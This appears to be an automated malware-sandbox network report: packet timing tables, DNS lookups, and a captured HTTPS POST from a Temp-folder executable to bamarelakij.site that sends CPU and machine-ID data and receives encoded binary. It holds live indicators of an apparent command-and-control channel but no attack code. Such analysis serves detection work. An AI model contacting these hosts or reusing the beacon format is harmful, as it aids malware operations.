Jan 9, 2025 14:56:33.599387884 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:33.599396944 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:33.599694967 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:33.606857061 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:33.731211901 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:33.767205000 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:33.937383890 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:33.939714909 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:33.939924955 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:33.945621014 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:33.945662975 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:33.945707083 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:33.946024895 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:33.946173906 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:33.946248055 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:33.954096079 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.057014942 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.063843966 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.099558115 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.137336969 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.137351990 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.137367964 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.137746096 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.145400047 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.239898920 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.240220070 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.245033979 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.245274067 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.255378962 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.255388975 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.255398989 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.255753040 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.255840063 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.255886078 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.264261007 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.363775015 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.369026899 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.369039059 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.369044065 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.369376898 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.377309084 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.473222971 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.481280088 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.481378078 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.481498003 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.481851101 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.491159916 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.591486931 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.596260071 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.596296072 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.596326113 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.596718073 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.609997988 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.706047058 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.714896917 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.714936972 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.714960098 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.715208054 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.723738909 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.842858076 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.860290051 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.860336065 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.860450029 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.860691071 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.868807077 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.966046095 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.972662926 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.972697973 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.972709894 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:34.972964048 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:34.982259989 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.079226971 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.086736917 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.086762905 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.086774111 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.086783886 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.087070942 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.110551119 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.207107067 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.215480089 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.215910912 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.215929985 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.217411995 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.230257034 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.326344013 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.333666086 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.333698988 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.333728075 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.334125042 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.341259003 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.440331936 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.452075005 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.452089071 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.452096939 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.452369928 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.458678007 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.554738045 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.561362982 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.561377048 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.561382055 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.561681986 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.568422079 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.664288044 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.686275005 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.686331034 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.686341047 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.686610937 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.693480968 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.789237022 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.796802044 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.796821117 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.796830893 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.797149897 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.804176092 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.901613951 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.913239002 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.913384914 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.913395882 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:35.913602114 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:35.921020985 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:36.040380001 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:36.053793907 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:36.053807974 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:36.053817034 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:36.054164886 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:36.061042070 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:36.156977892 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:36.164654970 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:36.164710999 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:36.164722919 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:36.164732933 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:36.165275097 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:36.205264091 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:36.294228077 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:57:12.360356092 CET	54384	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:57:12.360433102 CET	54384	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:57:12.360670090 CET	54384	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:57:12.360770941 CET	54384	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:57:12.869446039 CET	443	54384	162.159.61.3	192.168.2.10
Jan 9, 2025 14:57:12.870101929 CET	54384	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:57:12.905519962 CET	54384	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:57:12.967508078 CET	443	54384	162.159.61.3	192.168.2.10
Jan 9, 2025 14:57:12.967520952 CET	443	54384	162.159.61.3	192.168.2.10
Jan 9, 2025 14:57:12.967824936 CET	443	54384	162.159.61.3	192.168.2.10
Jan 9, 2025 14:57:12.967972994 CET	443	54384	162.159.61.3	192.168.2.10
Jan 9, 2025 14:57:12.968333960 CET	54384	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:57:12.968399048 CET	54384	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:57:13.065968037 CET	443	54384	162.159.61.3	192.168.2.10
Jan 9, 2025 14:57:13.066342115 CET	54384	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:57:13.164712906 CET	443	54384	162.159.61.3	192.168.2.10
Jan 9, 2025 14:57:13.165770054 CET	443	54384	162.159.61.3	192.168.2.10
Jan 9, 2025 14:57:13.165920019 CET	443	54384	162.159.61.3	192.168.2.10
Jan 9, 2025 14:57:13.166368961 CET	54384	443	192.168.2.10	162.159.61.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 14:55:59.287492037 CET	192.168.2.10	1.1.1.1	0x53f5	Standard query (0)	bamarelakij.site	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:08.720741034 CET	192.168.2.10	1.1.1.1	0x91c9	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:08.720920086 CET	192.168.2.10	1.1.1.1	0x8605	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Jan 9, 2025 14:56:09.803009987 CET	192.168.2.10	1.1.1.1	0x4db4	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:09.803148985 CET	192.168.2.10	1.1.1.1	0xf6ee	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Jan 9, 2025 14:56:11.051146030 CET	192.168.2.10	1.1.1.1	0x1075	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:11.051325083 CET	192.168.2.10	1.1.1.1	0x7dfd	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Jan 9, 2025 14:56:11.054975986 CET	192.168.2.10	1.1.1.1	0xee46	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:11.055180073 CET	192.168.2.10	1.1.1.1	0x3800	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Jan 9, 2025 14:56:11.075835943 CET	192.168.2.10	1.1.1.1	0xd466	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:11.076277971 CET	192.168.2.10	1.1.1.1	0xf9af	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Jan 9, 2025 14:56:11.087137938 CET	192.168.2.10	1.1.1.1	0x5b04	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:11.087274075 CET	192.168.2.10	1.1.1.1	0x4b5f	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Jan 9, 2025 14:56:13.633943081 CET	192.168.2.10	1.1.1.1	0x355c	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:13.634124994 CET	192.168.2.10	1.1.1.1	0xe425	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jan 9, 2025 14:56:13.634737968 CET	192.168.2.10	1.1.1.1	0x42a7	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:13.635729074 CET	192.168.2.10	1.1.1.1	0x973b	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jan 9, 2025 14:56:13.660232067 CET	192.168.2.10	1.1.1.1	0x466d	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:13.660392046 CET	192.168.2.10	1.1.1.1	0x9d3c	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jan 9, 2025 14:56:14.196863890 CET	192.168.2.10	1.1.1.1	0x230e	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:14.197105885 CET	192.168.2.10	1.1.1.1	0x996b	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 14:54:44.762084961 CET	1.1.1.1	192.168.2.10	0x910c	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:54:44.762084961 CET	1.1.1.1	192.168.2.10	0x910c	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:55:59.306039095 CET	1.1.1.1	192.168.2.10	0x53f5	No error (0)	bamarelakij.site		172.67.174.91	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:55:59.306039095 CET	1.1.1.1	192.168.2.10	0x53f5	No error (0)	bamarelakij.site		104.21.80.52	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:08.727387905 CET	1.1.1.1	192.168.2.10	0x91c9	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:08.727864027 CET	1.1.1.1	192.168.2.10	0x8605	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:09.048788071 CET	1.1.1.1	192.168.2.10	0x5cad	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:09.048800945 CET	1.1.1.1	192.168.2.10	0xffbb	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:09.048800945 CET	1.1.1.1	192.168.2.10	0xffbb	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:09.810141087 CET	1.1.1.1	192.168.2.10	0xf6ee	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:09.811459064 CET	1.1.1.1	192.168.2.10	0x4db4	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:11.058618069 CET	1.1.1.1	192.168.2.10	0x1075	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:11.059012890 CET	1.1.1.1	192.168.2.10	0x7dfd	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:11.064973116 CET	1.1.1.1	192.168.2.10	0xee46	No error (0)	sb.scorecardresearch.com		18.244.18.122	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:11.064973116 CET	1.1.1.1	192.168.2.10	0xee46	No error (0)	sb.scorecardresearch.com		18.244.18.38	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:11.064973116 CET	1.1.1.1	192.168.2.10	0xee46	No error (0)	sb.scorecardresearch.com		18.244.18.27	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:11.064973116 CET	1.1.1.1	192.168.2.10	0xee46	No error (0)	sb.scorecardresearch.com		18.244.18.32	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:11.083184004 CET	1.1.1.1	192.168.2.10	0xd466	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:11.084100008 CET	1.1.1.1	192.168.2.10	0xf9af	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:11.093839884 CET	1.1.1.1	192.168.2.10	0x5b04	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:11.093852043 CET	1.1.1.1	192.168.2.10	0x4b5f	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:13.641638994 CET	1.1.1.1	192.168.2.10	0x355c	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:13.641638994 CET	1.1.1.1	192.168.2.10	0x355c	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:13.641835928 CET	1.1.1.1	192.168.2.10	0xe425	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jan 9, 2025 14:56:13.642323017 CET	1.1.1.1	192.168.2.10	0x42a7	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:13.642323017 CET	1.1.1.1	192.168.2.10	0x42a7	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:13.643388987 CET	1.1.1.1	192.168.2.10	0x973b	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jan 9, 2025 14:56:13.667459965 CET	1.1.1.1	192.168.2.10	0x466d	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:13.667459965 CET	1.1.1.1	192.168.2.10	0x466d	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:13.668018103 CET	1.1.1.1	192.168.2.10	0x9d3c	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jan 9, 2025 14:56:14.205298901 CET	1.1.1.1	192.168.2.10	0x230e	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 14:56:14.205298901 CET	1.1.1.1	192.168.2.10	0x230e	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.97	A (IP address)	IN (0x0001)	false
Jan 9, 2025 14:56:14.205686092 CET	1.1.1.1	192.168.2.10	0x996b	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

bamarelakij.site

chrome.cloudflare-dns.com

clients2.googleusercontent.com

https:

sb.scorecardresearch.com

browser.events.data.msn.com

c.msn.com

ntp.msn.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49975	172.67.174.91	443	1076	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:55:59 UTC	352	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 Content-Length: 147 Host: bamarelakij.site
2025-01-09 13:55:59 UTC	147	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 60 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 0d 7a 80 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzdz$9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-09 13:56:00 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 13:56:00 GMT Transfer-Encoding: chunked Connection: close v: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjEA9a7AroXuILn0l0%2FVVXz6T8B4GnLt4lonfqcqCrTiXAosa0YCoRtfXqzzJCXHUyh1sj7deAsO45fGmRhbMKGmc79s7TNsJ%2Fm3DiUzme9xt%2BQPhLIAhAsS8uejKbhwHU14"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ed9b6a224387-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2165&min_rtt=1592&rtt_var=1743&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1135&delivery_rate=472721&cwnd=81&unsent_bytes=0&cid=c88ec9487502f6a3&ts=720&x=0"
2025-01-09 13:56:00 UTC	555	IN	Data Raw: 33 32 66 32 0d 0a f2 82 00 00 00 00 00 00 00 00 00 00 e0 c7 0b 36 0e 00 7f 0e 86 0b 13 00 ec 0e 16 11 02 ec 08 7a 59 86 0b 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 20 00 96 09 05 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 05 0f 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e ab a7 ab 1b 1a 99 19 27 b7 32 b2 2e 2b b0 36 3b b2 2e a9 3a b2 b0 b6 04 00 ac 09 ce 02 0f 00 e4 0e 16 11 02 e4 04 34 59 ce 02 bc 58 d8 c3 49 7d 17 f0 0b 00 42 01 a9 05 13 00 ec 0e 16 11 02 ec 08 34 59 a9 05 65 9b b6 a7 b7 51 c9 59 28 39 b2 33 b2 39 b2 37 b1 b2 b9 04 00 c6 03 32 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 32 0c 65 fc e2 b9 9f d9 2d 8a 04 00 24 09 7a 0d 0f 00 e4 0e 16 11 02 e4 04 76 59 7a 0d f9 87 f9 1f 08 a2 36 2c 20 00 da 0c 94 00 13 00 ec 0e 16 11 02 ec Data Ascii: 32f26zYeQY199 >YeQY#*).'2.+6;.:4YXI}B4YeQY(93972rY2e-$zvYz6,
2025-01-09 13:56:00 UTC	1369	IN	Data Raw: 39 b7 bb b9 b2 39 b9 0a 00 1a 02 7b 0c 13 00 ec 0e 16 11 02 ec 08 76 59 7b 0c 65 9b b6 a7 b7 51 c9 59 b6 b9 b2 32 b3 b2 17 b2 3c b2 08 00 8c 06 43 09 13 00 eb 0e 16 11 02 eb 08 34 59 43 09 47 ac ad f0 3d 2b 6a cc b2 32 32 97 01 18 2c 3f 04 00 a5 0a a1 0c 0f 00 e4 0e 16 11 02 e4 04 34 59 a1 0c a0 8a c3 bc 51 af 0c 8f 0e 00 92 02 cd 09 13 00 ec 0e 16 11 02 ec 08 7a 59 cd 09 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 16 00 89 02 22 06 13 00 ec 0e 16 11 02 ec 08 73 59 22 06 65 9b b6 a7 b7 51 c9 59 2a b2 36 b2 b3 39 b0 b6 10 22 b2 b9 b5 3a b7 38 2e 3a 32 b0 3a b0 08 00 e1 03 08 0a 13 00 eb 0e 16 11 02 eb 08 d8 59 08 0a 01 28 f6 ed 70 e9 f5 15 f1 b6 69 8a 4c da b3 e6 08 00 49 03 41 03 13 00 eb 0e 16 11 02 eb 08 34 59 41 03 f9 12 0f 10 33 Data Ascii: 99{vY{eQY2<C4YCG=+j22,?4YQzYeQY199"sY"eQY*69":8.:2:Y(piLIA4YA3
